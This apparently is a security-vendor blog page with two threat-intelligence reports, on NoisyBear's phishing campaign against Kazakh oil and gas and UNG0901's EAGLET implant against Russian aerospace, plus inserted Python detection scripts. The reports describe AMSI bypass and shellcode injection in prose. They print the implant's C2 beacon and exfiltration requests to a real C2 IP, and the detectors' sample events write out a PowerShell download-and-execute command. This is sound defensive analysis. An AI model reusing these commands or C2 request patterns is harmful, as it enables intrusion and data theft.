Tag: Targets

  • NoisyBear Targets Kazakhstan Oil & Gas



    Contents

    • Introduction
    • Key Targets
      • Industries Affected
      • Geographical Focus
    • Infection Chain
    • Initial Findings
      • Looking into the malicious email
      • Looking into the decoy document
    • Technical Analysis
      • Stage 0 – Malicious ZIP & LNK files
      • Stage 1 – Malicious BATCH scripts
      • Stage 2 – Malicious DOWNSHELL loaders
      • Stage 3 – Malicious DLL implant
    • Infrastructure and Hunting
    • Attribution
    • Conclusion
    • Seqrite Protection
    • IOCs
    • MITRE ATT&CK

    Authors: Subhajeet Singha & Sathwik Ram Prakki

    Introduction

    Seqrite Labs APT-Team has been tracking a previously undocumented threat group since April 2025, which we track as Noisy Bear. The group has targeted entities in Central Asia, specifically the oil and gas (energy) sector of Kazakhstan. The campaign targets employees of KazMunaiGas (KMG): the threat actor delivered a fake document purporting to come from the KMG IT department, mimicking official internal communication and using themes such as policy updates, internal certification procedures and salary adjustments.

    In this blog, we explore the in-depth technical details of the campaign as we encountered it during our analysis. We examine its stages in turn: the infection starts with a phishing email carrying a ZIP attachment, which contains a malicious LNK downloader along with a decoy; the LNK downloads a malicious BATCH script, which in turn leads to PowerShell loaders we have dubbed DOWNSHELL, which reflectively load a malicious DLL implant. We also look at the infrastructure behind the entire campaign.

    Key Targets

    Industries Affected

    • Energy Sector [Oil and Gas]

    Geographical Focus

    Infection Chain

    Initial Findings

    We have been tracking this threat actor since April 2025, and in May 2025 we observed it launch a spear-phishing campaign against KazMunaiGas employees. A compromised business email account was used to deliver a malicious ZIP file containing a decoy alongside the initial-infection shortcut (.LNK) file, named График зарплат.lnk, which translates to Salary Schedule.lnk. The sample first surfaced on VirusTotal in the first half of May 2025.

    Now, let us look into the malicious email and decoy file.

    Looking into the malicious email

    Looking at the sender of the email file, we found that the threat actor used the compromised business email account of an individual working in the Finance Department of KazMunaiGas. From that account, and with the urgent-sounding subject URGENT! Review the updated salary schedule, the email was sent to employees of KMG.

    The contents of the email make clear that the message was crafted to look like an internal HR communication about salary-related discussions or decisions. It asks the recipient to review updated information on a range of topics such as work schedules, salaries and incentive-related policies and decisions. The threat actor then instructs the KMG targets to look for a file named График.zip (Schedule.zip) and open the file График зарплат (Salary Schedule), which is the shortcut (LNK) file that, once executed, downloads the further stagers.

    Last but not least, the email asks the recipient to complete the instructions by 15th May 2025, adding a sense of urgency. Now, let us go ahead and analyze the decoy file.

    Looking into the decoy document

    The decoy document carries the official logo of the targeted entity, i.e., KazMunaiGas, along with instructions in both Russian and Kazakh that walk the employee through a series of simple steps: open the Downloads folder in the browser, extract a ZIP archive named KazMunayGaz_Viewer.zip, and run a file called KazMunayGaz_Viewer. The file name in the instructions does not matter; we believe this is the same file dropped by the malicious email. The decoy also tells users to wait for a console window to appear and specifically advises them not to close or interact with it, which limits suspicion on the target’s side. Last but not least, it is signed off by the IT-Support team so that, together with the artefacts above, it looks completely legitimate.

    Technical Analysis

    We have divided the technical analysis into four parts: first the malicious ZIP containing the LNK file, then the malicious batch script it downloads, then the script-based loader, and finally the malicious DLL.

    Stage 0 – Malicious ZIP & LNK Files

    Looking into the ZIP file, we found three files: the decoy document we saw earlier, a README.txt that repeats the instructions so that nothing seems suspicious, and the malicious LNK file.

    Looking into the malicious shortcut (.LNK) file, named График зарплат, we found that it uses the powershell.exe LOLBIN to act as a downloader.

    It downloads a malicious batch script named 123.bat from a remote server, hxxps[://]77[.]239[.]125[.]41[:]8443, stores it under the path C:\Users\Public, and then executes the batch script from that path using the Start-Process cmdlet.

    Hunting for similar LNK files, we found another LNK belonging to the same campaign, which looks slightly different.

    This LNK file uses a small operand trick to avoid static signature detection: it builds its strings by concatenating string literals, but otherwise does the same thing, downloading a batch script from the same remote server, saving it to the Public folder and executing it via the cmdlet.

    In the next section, we examine the malicious BATCH scripts.

    Stage 1 – Malicious BATCH Scripts

    Looking into one of the BATCH scripts, i.e., it.bat, we can see that it downloads the PowerShell loaders, which we have dubbed DOWNSHELL, from the remote server as support.ps1 and a.ps1. Once they are downloaded, it sleeps for a total of 11 seconds.

    The second batch script, i.e., the 123.bat file, does the same: it downloads the PowerShell loaders, followed by a sleep of 10 seconds.

    In the next section, we move on to the workings of the DOWNSHELL loaders written in PowerShell.
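    As an added example (not code from the post), here is a small Python heuristic that flags the Stage 0/1 process chain described above in Sysmon-style process-creation events: PowerShell started from explorer.exe fetching a script into C:\Users\Public, Start-Process of that script, the batch file running under cmd.exe, and the batch file pulling .ps1 loaders. The event lines are constructed for the demonstration; the field names follow Sysmon event 1 and the remote-server IP is the one reported above.

```python
"""Process-creation heuristics for the NoisyBear Stage 0/1 chain:
LNK -> powershell.exe (parent explorer.exe) downloads a .bat into
C:\\Users\\Public and runs it with Start-Process; the .bat then fetches the
DOWNSHELL .ps1 loaders. Added example; the JSON events below are constructed."""
import json
import re
from typing import Dict, List, Tuple

PUBLIC_DIR = r"c:\\users\\public\\"                                   # regex for C:\Users\Public\
URL_WITH_PORT = re.compile(r"https?://\S+?:\d{2,5}", re.I)             # explicit port, e.g. :8443
DOWNLOADER = re.compile(r"\b(invoke-webrequest|iwr|curl|wget|downloadfile|downloadstring)\b", re.I)
START_PROCESS = re.compile(r"\bstart-process\b", re.I)
PUBLIC_SCRIPT = re.compile(PUBLIC_DIR + r"[^\s\"';]+\.(bat|cmd|ps1)\b", re.I)
PUBLIC_BATCH = re.compile(PUBLIC_DIR + r"[^\s\"';]+\.(bat|cmd)\b", re.I)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event matches (empty list = not flagged)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    # Stage 0: PowerShell spawned by explorer.exe (how a double-clicked LNK runs),
    # fetching from a URL with an explicit port and writing into C:\Users\Public.
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe") \
            and URL_WITH_PORT.search(cmd) and DOWNLOADER.search(cmd) and PUBLIC_SCRIPT.search(cmd):
        hits.append("lnk_powershell_downloader")
    # Stage 0: Start-Process of a script that lives in C:\Users\Public.
    if image.endswith("powershell.exe") and START_PROCESS.search(cmd) and PUBLIC_SCRIPT.search(cmd):
        hits.append("start_process_public_script")
    # Stage 1: the dropped batch file itself running under cmd.exe.
    if image.endswith("cmd.exe") and PUBLIC_BATCH.search(cmd):
        hits.append("public_batch_execution")
    # Stage 1: a batch file's PowerShell child downloading .ps1 loaders.
    if image.endswith("powershell.exe") and parent.endswith("cmd.exe") \
            and DOWNLOADER.search(cmd) and ".ps1" in cmd.lower():
        hits.append("batch_fetches_ps1_loader")
    return hits


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Parse JSON event lines; return (line number, matched rules) for flagged events."""
    flagged: List[Tuple[int, List[str]]] = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        hits = classify(json.loads(line))
        if hits:
            flagged.append((n, hits))
    return flagged


# Constructed events (Sysmon-like fields). Lines 1-3 mimic the chain; 4-5 are benign.
SAMPLE_EVENTS = r'''
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -c \"iwr https://77.239.125.41:8443/123.bat -OutFile C:\\Users\\Public\\123.bat; Start-Process C:\\Users\\Public\\123.bat\""}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "cmd.exe /c C:\\Users\\Public\\123.bat"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -c \"iwr https://77.239.125.41:8443/support.ps1 -OutFile C:\\Users\\Public\\support.ps1\""}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /c C:\\Tools\\build.bat"}
'''.strip().splitlines()

if __name__ == "__main__":
    for line_no, rules in scan(SAMPLE_EVENTS):
        print(f"event {line_no}: {', '.join(rules)}")
```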

    Stage 2 – Malicious DOWNSHELL Loaders

    In this section we look into the set of malicious PowerShell scripts we have dubbed DOWNSHELL. The first PowerShell file, support.ps1, is responsible for impairing defenses on the target machine, while the second performs the loader function.

    Looking into the code, we found that the script obfuscates the target namespace by building the string “System.Management.Automation” through concatenation, then enumerates all loaded .NET assemblies in the current AppDomain and filters for the one whose FullName matches that namespace.

    Then, using reflection, it resolves the internal type System.Management.Automation.AmsiUtils and retrieves its private static field amsiInitFailed. Flipping this flag convinces PowerShell that AMSI failed to initialize, so the other malicious script of the DOWNSHELL family is not scanned and executes without interruption. Now, let us look into the second PowerShell script.

    The first part of the code looks like a copy of the well-known red-team tool PowerSploit. The function LookupFunc dynamically retrieves the memory address of any exported function from a specified DLL without using traditional DllImport or Add-Type calls. It does this by locating the Microsoft.Win32.UnsafeNativeMethods type within the already-loaded System.dll assembly, then extracting and invoking the hidden .NET wrappers for GetModuleHandle and GetProcAddress. By first resolving the base address of the target module ($moduleName) and then passing it along with the target function name ($functionName), it returns a raw function pointer to that API.

    The second part of the code, the function getDelegateType, creates a custom .NET delegate on the fly, entirely in memory. It takes the parameter types and the return type, builds a new delegate class with them, and gives it an Invoke method so it can be used like a normal function. This lets the script wrap the raw function pointers obtained from LookupFunc into something PowerShell can call directly, making it easy to run Win32 API functions without importing them in the usual way. The script then queries the process ID of the explorer.exe process and stores it in a variable.

    The latter part of the script holds a byte array containing the Meterpreter reverse_tcp shellcode and uses the classic CreateRemoteThread injection technique, i.e., OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread, to inject the shellcode into the target process, explorer.exe, followed by the message Injected! Check your listener!.

    An interesting part of this script is a commented-out section that performs reflective DLL injection into a remote process, notepad in this case, using PowerSploit, which is hosted on the remote server and downloaded, with a Meterpreter-based DLL as the payload. Another notable detail is that the comments are written in Russian. In the next section, we examine the DLL.

    Stage 3 – Malicious DLL Implant

    We first examined the DLL implant in a PE-analysis tool, which confirmed that the DLL implant, or shellcode loader, is a 64-bit binary.

    Moving on to the code, we saw that the implant uses a semaphore as a gatekeeper to make sure only one copy of itself runs at a time; in this case the implant uses the named object Local\doSZQmSnP12lu4Pb5FRD. When it starts, it tries to create this semaphore; if it already exists, another instance is active. To double-check, it calls WaitForSingleObject on the semaphore and then looks for a specific named event. If the event exists, it knows another instance has already completed its setup; if it doesn’t, it creates the event itself.

    Depending on the outcome of that instance check, the next step spawns a rundll32.exe process in a suspended state.

    After creating the process in a suspended state, the implant performs classic thread-context hijacking: it calls GetThreadContext on the primary thread, uses VirtualAllocEx to reserve RWX memory in the target, WriteProcessMemory to write the shellcode, updates the thread’s RIP to point to that buffer via SetThreadContext, and finally calls ResumeThread so execution continues at the injected shellcode. In this case, the shellcode is a reverse shell.

    Infrastructure & Hunting

    Looking into the infrastructure the threat entity had been using, we found a few interesting details.

    Tool-Arsenal

    Along with the tools we saw being used by the threat actor, we found that more open-source red-team tools had been hosted by the threat actor for further use.

    Pivoting

    Using the same fingerprint, we hunted for and found similar infrastructure belonging to the same threat actor.

    One of the most interesting aspects is that both pieces of infrastructure are hosted with a sanctioned hosting firm, Aeza Group LLC.

    We also discovered a number of suspicious web applications being hosted there, related to wellness, fitness and health assistance for Russian individuals.

    Attribution

    Attribution is a very important metric when describing a threat entity. It involves analyzing and correlating various domains, including Tactics, Techniques and Procedures (TTPs), rotation and re-use of similar infrastructure artefacts, operational mistakes that could lead to attribution, and much more.

    In our ongoing tracking of Noisy Bear, we have collected a number of artefacts, such as the language used inside the tooling, the use of sanctioned web-hosting services, and behavioral artefacts similar to those of Russian threat entities that have previously targeted Central Asian nations. Based on these, we assess that the threat actor is possibly of Russian origin.

    Conclusion

    We have found that a threat entity we dub NoisyBear is targeting the Kazakh energy sector using company-specific lures while relying heavily on PowerShell and open-source post-exploitation tools such as Metasploit, hosted on a sanctioned web-hosting provider. We can also conclude that the threat actor has been active since April 2025.

    SEQRITE Protection

    TBD.

    IOCs

    Domains/IPs
    77[.]239[.]125[.]41
    wellfitplan[.]ru
    178[.]159[.]94[.]8

    MITRE ATT&CK

    Tactic               Technique ID   Name
    Reconnaissance       T1589.002      Gather Victim Identity Information: Email Addresses
    Initial Access       T1204.002      User Execution: Malicious File
    Initial Access       T1078.002      Valid Accounts: Domain Accounts
    Execution            T1059.001      Command and Scripting Interpreter: PowerShell
    Execution            T1059.00
    Defense Evasion      T1562          Impair Defenses
    Defense Evasion      T1027.007      Dynamic API Resolution
    Defense Evasion      T1027.013      Encrypted/Encoded File
    Defense Evasion      T1055.003      Thread Execution Hijacking
    Defense Evasion      T1620          Reflective Code Loading
    Defense Evasion      T1218.011      System Binary Proxy Execution: Rundll32
    Command and Control  T1105          Ingress Tool Transfer
    Exfiltration         T1567.002      Exfiltration to Cloud Storage


  • Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant



    Contents

    • Introduction
    • Initial Findings
    • Infection Chain
    • Technical Analysis
      • Stage 0 – Malicious Email File
      • Stage 1 – Malicious LNK file
      • Stage 2 – Looking into the decoy file
      • Stage 3 – Malicious EAGLET implant
    • Hunting and Infrastructure
      • Infrastructural details
      • Similar campaigns
    • Attribution
    • Conclusion
    • SEQRITE Protection
    • IOCs
    • MITRE ATT&CK

    Introduction

    SEQRITE Labs APT-Team has recently found a campaign targeting the Russian aerospace industry. The campaign is aimed at employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia, and uses товарно-транспортная накладная (TTN) documents, which are critical to Russian logistics operations, as lures. The malware ecosystem of this campaign consists of a malicious LNK file and the EAGLET DLL implant, which executes malicious commands and exfiltrates data.

    In this blog, we explore the technical details of the campaign as we encountered it during our analysis. We examine its various stages, starting with a deep dive into the initial infection chain, moving on to the implant used in this campaign, and ending with a final overview of the campaign.

    Initial Findings

    On the 27th of June, while hunting for malicious spear-phishing attachments, our team found a malicious email file that had surfaced on sources such as VirusTotal. Upon further hunting, we also found a malicious LNK file responsible for executing the malicious DLL attachment, whose file type was masquerading as a ZIP attachment.

    Looking into the email, we found that the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip, which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip, is in fact a DLL file, and upon further hunting we found a shortcut (LNK) file with the same name. We then looked into the workings of these files.

    Infection Chain


    Technical Analysis

    We break down the analysis of this campaign into three parts, starting with the malicious EML file, followed by the attachment, i.e., the malicious DLL implant, and the LNK file.

    Stage 0 – Malicious Email File

    Initially, we found a malicious e-mail file named backup-message-10.2.2.20_9045-800282.eml, uploaded from the Russian Federation, and looked into its specifics.

    We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO), purportedly from a Transport and Logistics Centre, regarding a delivery note.

    Looking at the contents of the email, we found that the message was crafted to deliver news of a recent logistics movement, referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), and urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. Besides the fact that the threat actor impersonates an individual, we also noticed a malicious attachment masquerading as a ZIP file. Upon downloading it, we found that it was a malicious DLL implant.

    Apart from the malicious DLL implant, we also hunted down a malicious LNK file with the same name, which we believe was dropped by another spear-phishing attachment and is used to execute this DLL implant, which we have named EAGLET.

    In the next section, we will look into the malicious LNK file.

    Stage 1 – Malicious LNK File

    Looking inside the LNK file, we found that it performs a specific set of tasks that finally execute the malicious DLL file and also spawn a decoy pop-up on the screen. It does this in the following manner.

    It uses the powershell.exe binary to run a script in the background, which looks for the masquerading ZIP file, i.e., the malicious EAGLET implant. If it finds the implant, it executes it via the rundll32.exe LOLBIN; if not, it recursively searches for the file under %USERPROFILE% and runs it if found, and if that also fails, it tries to look under the %TEMP% location.

    Once the DLL implant has been found and executed, the script extracts a decoy XLS file embedded within the implant: it reads the 59904-byte XLS file stored immediately after the first 296960 bytes of the implant and writes it to the %TEMP% directory under the name ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. That is the purpose of the malicious LNK file; in the next section, we look into the decoy file.
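    The LNK carves the decoy at a fixed offset (the 59904 bytes following the first 296960). The following added Python example, not code from the post or from the campaign, generalizes this by computing where the overlay starts from the PE section table and returning it only when it begins with the OLE2 magic of a legacy .xls; build_sample_pe constructs a minimal PE for the demonstration, so its offsets are not those of the real implant.

```python
"""Carve a decoy document appended to a PE file as overlay data.
Added example: overlay_offset() reads the section table instead of relying on
a hard-coded offset; build_sample_pe() is a constructed stand-in for the implant."""
import struct
from typing import Optional

OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # header of a legacy .xls/.doc (OLE2 compound file)


def overlay_offset(data: bytes) -> int:
    """File offset where the overlay starts: the end of the highest-placed
    section's raw data, taken from the section headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]     # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]        # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    sect_table = coff + 20 + opt_size
    end = sect_table + 40 * num_sections                           # never earlier than the headers
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER: SizeOfRawData at +16, PointerToRawData at +20
        size_raw, ptr_raw = struct.unpack_from("<II", data, sect_table + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    return end


def extract_overlay_decoy(data: bytes) -> Optional[bytes]:
    """Return the overlay when it carries an OLE2 document (the decoy), else None."""
    overlay = data[overlay_offset(data):]
    return overlay if overlay.startswith(OLE2_MAGIC) else None


def carve_fixed(data: bytes, offset: int, size: int) -> bytes:
    """What the LNK script does: read `size` bytes at `offset` (296960 and 59904 in the post)."""
    return data[offset:offset + size]


def build_sample_pe(section_size: int, overlay: bytes) -> bytes:
    """Constructed minimal PE32+ image with a single .text section, for demonstration only."""
    e_lfanew = 0x40
    opt_size = 240                                   # size of a PE32+ optional header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=AMD64, 1 section, no timestamp/symbols, optional header size, characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, opt_size, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)       # PE32+ magic, rest zeroed
    headers_len = e_lfanew + 4 + 20 + opt_size + 40
    ptr_raw = (headers_len + 0x1FF) & ~0x1FF         # raw data aligned to 512 bytes
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", section_size, 0x1000, section_size, ptr_raw, 0, 0, 0, 0, 0x60000020)
    image = dos + b"PE\0\0" + coff + opt + section
    image += b"\0" * (ptr_raw - len(image)) + b"\x90" * section_size
    return image + overlay


if __name__ == "__main__":
    sample = build_sample_pe(1024, OLE2_MAGIC + b"\0" * 504)
    decoy = extract_overlay_decoy(sample)
    print("overlay starts at", overlay_offset(sample), "decoy bytes:", len(decoy) if decoy else 0)
```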

    Stage 2 – Looking into the decoy file

    In this section, we look into the XLS decoy file extracted from the DLL implant.

    We identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization was sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.

    The XLS file contains structured fields for recording container number, type, tare weight, load capacity and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status (loaded, empty or under repair) and a schematic area designated for marking physical damage on the container.

    The decoy also contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates and corner fittings. Each damage type is numbered from 1 to 24, mimicking standardized inspection documentation.

    Overall, the decoy simulates an official Russian container inspection document, specifically an Equipment Interchange Report (EIR), used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts, all associated with Obltransterminal LLC. In the next section, we look into the EAGLET implant.

    Stage 3 – Malicious EAGLET implant

    Loading the implant into a PE-analysis tool confirmed that it is a PE file, with the decoy stored in the overlay section, as we saw previously.

    Next, looking into the exports of this malicious DLL, we checked the EntryPoint, which unfortunately did not contain anything interesting. The DllEntryPoint, however, led us to DllMain, which does contain the code related to the malicious behavior.

    The first interesting function enumerates information about the target machine.

    In this function, the code creates a unique GUID for the target, which is used to identify the victim. A new GUID is generated every time the implant is executed; this mimics the behavior of a session ID and helps the operator, i.e., the threat actor, keep track of the target.


    Then it enumerates the computer name of the target machine along with the hostname and DNS domain name. Once it has these, it creates a directory named MicrosoftApppStore under the ProgramData location.

    Next, using CreateThread, it creates a malicious thread responsible for connecting to the command-and-control (C2) IP and more.

    Next, we can see that the implant uses Windows networking APIs such as WinHttpOpen to initiate an HTTP session, masquerading under the uncommon user-agent string MicrosoftAppStore/2001.0, followed by WinHttpConnect, which tries to connect to the hardcoded command-and-control (C2) server 185.225.17.104 over port 80; if this fails, it keeps retrying.

    Once the implant connects to the C2, it forms a URL path used to send a GET request to the C2 infrastructure. The request looks like this:

    GET /poll?id={randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
    Host: 185.225.17.104

    After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain commands to execute.

    Regarding functionality, the implant supports shell access, which gives the C2 operator, i.e., the threat actor, a shell on the target machine that can be used for further malicious activity.

    Another feature is the download function, which either downloads malicious content from the server or exfiltrates required or interesting files from the target machine. The download path stores content from the server under C:\ProgramData\MicrosoftAppStore\. As the C2 was down at the time of publishing this research, the files that had or have been used could not be recovered.

    Separately from the download feature, it also became evident that the implant exfiltrates files from the target machine. The request looks like this:

    POST /result HTTP/1.1
    Host: 185[.]225[.]17[.]104
    Content-Type: application/x-www-form-urlencoded

    id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

    The features are summarized below.

    Feature             Trigger Keyword   Behavior                                                                                     Purpose
    Command Execution   cmd:              Executes a shell command received from the C2 server and captures the output                 Remote Code Execution
    File Download       download:         Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\    Payload Staging
    Exfiltration        (automatic)       Sends back the result of command execution or download status to the C2 server via HTTP POST Data Exfiltration
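    An added Python example (not code from the post) that detects this request shape in web-proxy logs: GET /poll with a GUID id plus hostname and domain parameters, and POST /result with a base64 result field, which it decodes for the analyst. The pipe-separated log format and the sample lines are constructed, reusing the GUID, hostname and C2 IP quoted above; the user-agent is treated as a secondary, lower-confidence signal.

```python
"""Detect EAGLET-style C2 traffic in web-proxy logs and decode uploaded results.
Added example; the log format and lines are constructed, not captured traffic."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

EAGLET_UA = "MicrosoftAppStore/2001.0"                     # user-agent string used by the implant
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)


@dataclass
class Hit:
    kind: str                      # "poll", "result" or "ua_only"
    victim_id: str = ""
    hostname: str = ""
    domain: str = ""
    decoded_result: Optional[str] = None


def _first(params: str) -> Dict[str, str]:
    """Flatten a query or form-encoded string to {key: first value}."""
    return {k: v[0] for k, v in parse_qs(params).items()}


def inspect_request(method: str, url: str, user_agent: str, body: str = "") -> Optional[Hit]:
    """Return a Hit when the request matches EAGLET's beacon or result upload, else None."""
    parts = urlsplit(url)
    if method == "GET" and parts.path == "/poll":
        q = _first(parts.query)
        # Beacon: /poll?id=<GUID>&hostname=...&domain=...
        if {"id", "hostname", "domain"}.issubset(q) and GUID_RE.match(q["id"]):
            return Hit("poll", q["id"], q["hostname"], q["domain"])
    if method == "POST" and parts.path == "/result":
        f = _first(body)
        if {"id", "hostname", "domain", "result"}.issubset(f):
            try:   # the result field is base64; decode it so the analyst sees the command output
                decoded = base64.b64decode(f["result"], validate=True).decode("utf-8", "replace")
            except ValueError:          # binascii.Error is a ValueError subclass
                decoded = None
            return Hit("result", f["id"], f["hostname"], f["domain"], decoded)
    if user_agent == EAGLET_UA:         # path shape changed but the UA survived
        return Hit("ua_only")
    return None


def scan_log(lines: List[str]) -> List[Hit]:
    """Parse 'client|method|url|user-agent|body' lines (constructed format) and collect hits."""
    hits: List[Hit] = []
    for line in lines:
        if not line.strip():
            continue
        _client, method, url, ua, body = line.split("|", 4)
        hit = inspect_request(method, url, ua, body)
        if hit:
            hits.append(hit)
    return hits


# Constructed log: two implant requests from one client, then two benign requests.
SAMPLE_LOG = """
10.0.0.5|GET|http://185.225.17.104/poll?id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP|MicrosoftAppStore/2001.0|
10.0.0.5|POST|http://185.225.17.104/result|MicrosoftAppStore/2001.0|id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==
10.0.0.7|GET|https://www.example.com/poll?id=42|Mozilla/5.0 (Windows NT 10.0)|
10.0.0.8|GET|https://www.example.com/index.html|Mozilla/5.0 (Windows NT 10.0)|
""".strip().splitlines()

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
```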

    That sums up the technical analysis of the EAGLET implant. Next, we look at the infrastructure and hunt for similar campaigns.

    Hunting and Infrastructure

    Infrastructural details

    In this section, we look into the infrastructure-related artefacts. The C2 we found, 185[.]225[.]17[.]104, is the server the EAGLET implant connects to. It is located in Romania under ASN 39798 of MivoCloud SRL.

    Looking into it, we found a number of passive DNS records pointing to historical infrastructure previously associated with the TA505 threat cluster, as researched by BinaryDefense. The DNS records suggest that similar or recycled infrastructure has been used in this campaign. Apart from this infrastructural overlap with TA505 in terms of recycled domains, we also saw other dodgy domains with DNS records pointing to the same infrastructure. With high confidence, we assess that the current campaign has no correlation with TA505 beyond the afore-mentioned information.

    Similar to the campaign targeting the aerospace sector, we also found another campaign targeting the Russian military sector through recruitment-themed documents. In that campaign, the threat actor used the EAGLET implant connecting to the C2 188[.]127[.]254[.]44, which is located in Russia under ASN 56694, belonging to the LLC Smart Ape organization.

    Similar Campaigns

    Campaign 1 – Military Themed Targeting

    The URL structure and many other behavioral artefacts of the implant led us to another set of campaigns using an identical implant to target Russian military recruitment.

    This decoy was extracted from an EAGLET implant named Договор_РН83_изменения.zip, which translates to Contract_RN83_Changes, and which has been targeting individuals and entities related to Russian military recruitment. As we can see, the decoy highlights multiple advantages of serving, from house mortgages to pensions and more.

    Campaign 2 – EAGLET implant with no decoy embedded

    In the previous campaigns we saw that the threat entity occasionally drops a malicious LNK that executes the DLL implant and extracts the decoy present in the implant’s overlay section; in this case, we also saw an implant with no such decoy embedded.

    Along with these, we also saw multiple overlaps between these campaigns, both in target interests and in implant code, with the threat entity known as Head Mare, which has been targeting Russian-speaking entities and was initially discovered by researchers at Kaspersky.

    Attribution

    Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.

    In our ongoing tracking of UNG0901, we discovered notable similarities and overlaps with the threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.

    Key Overlaps Between UNG0901 and Head Mare

    1. Tooling Arsenal:

    Researchers at Kaspersky observed that Head Mare often uses a Golang-based backdoor known as PhantomDL, often packed with a software packer such as UPX, with simple yet functional features such as shell, download, upload and exit. Similarly, UNG0901 has deployed the EAGLET implant, programmed in C++, which shows similar behavior and has nearly identical features such as shell, download and upload.

    2. File-Naming technique:

    Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523; in the UNG0901 campaigns we witnessed, there were file names in a similar style, such as Contract_RN83_Changes, along with many other file-naming schemes we found to be similar.

    3. Motivation:

    Head Mare has been targeting important entities related to Russia, and UNG0901 has likewise targeted multiple important entities belonging to Russia.

    Apart from these, there are additional strong similarities that reinforce the connection between these two threat entities; we therefore assess that UNG0901 shares resources and many other similarities with Head Mare, targeting Russian governmental and non-governmental entities.

    Conclusion

    UNG0901, or Unknown-Group-901, demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare, with multiple similarities such as decoy nomenclature and more.

    SEQRITE Protection

    IOCs


    MITRE ATT&CK

    Tactic | Technique | ID | Details
    Initial Access | Spearphishing Attachment | T1566.001 | Malicious .EML file sent to VASO employee, impersonating a logistics center with TTN document lure.
    Execution | System Binary Proxy Execution: Rundll32 | T1218.011 | DLL implant executed via trusted rundll32.exe LOLBIN, called from the .LNK file.
    Execution | PowerShell | T1059.001 | Used for locating and launching the DLL implant from multiple fallback directories.
    Persistence | Implant in ZIP-disguised DLL | [Custom] | DLL masquerades as .ZIP file; persistence implied via operator-controlled executions.
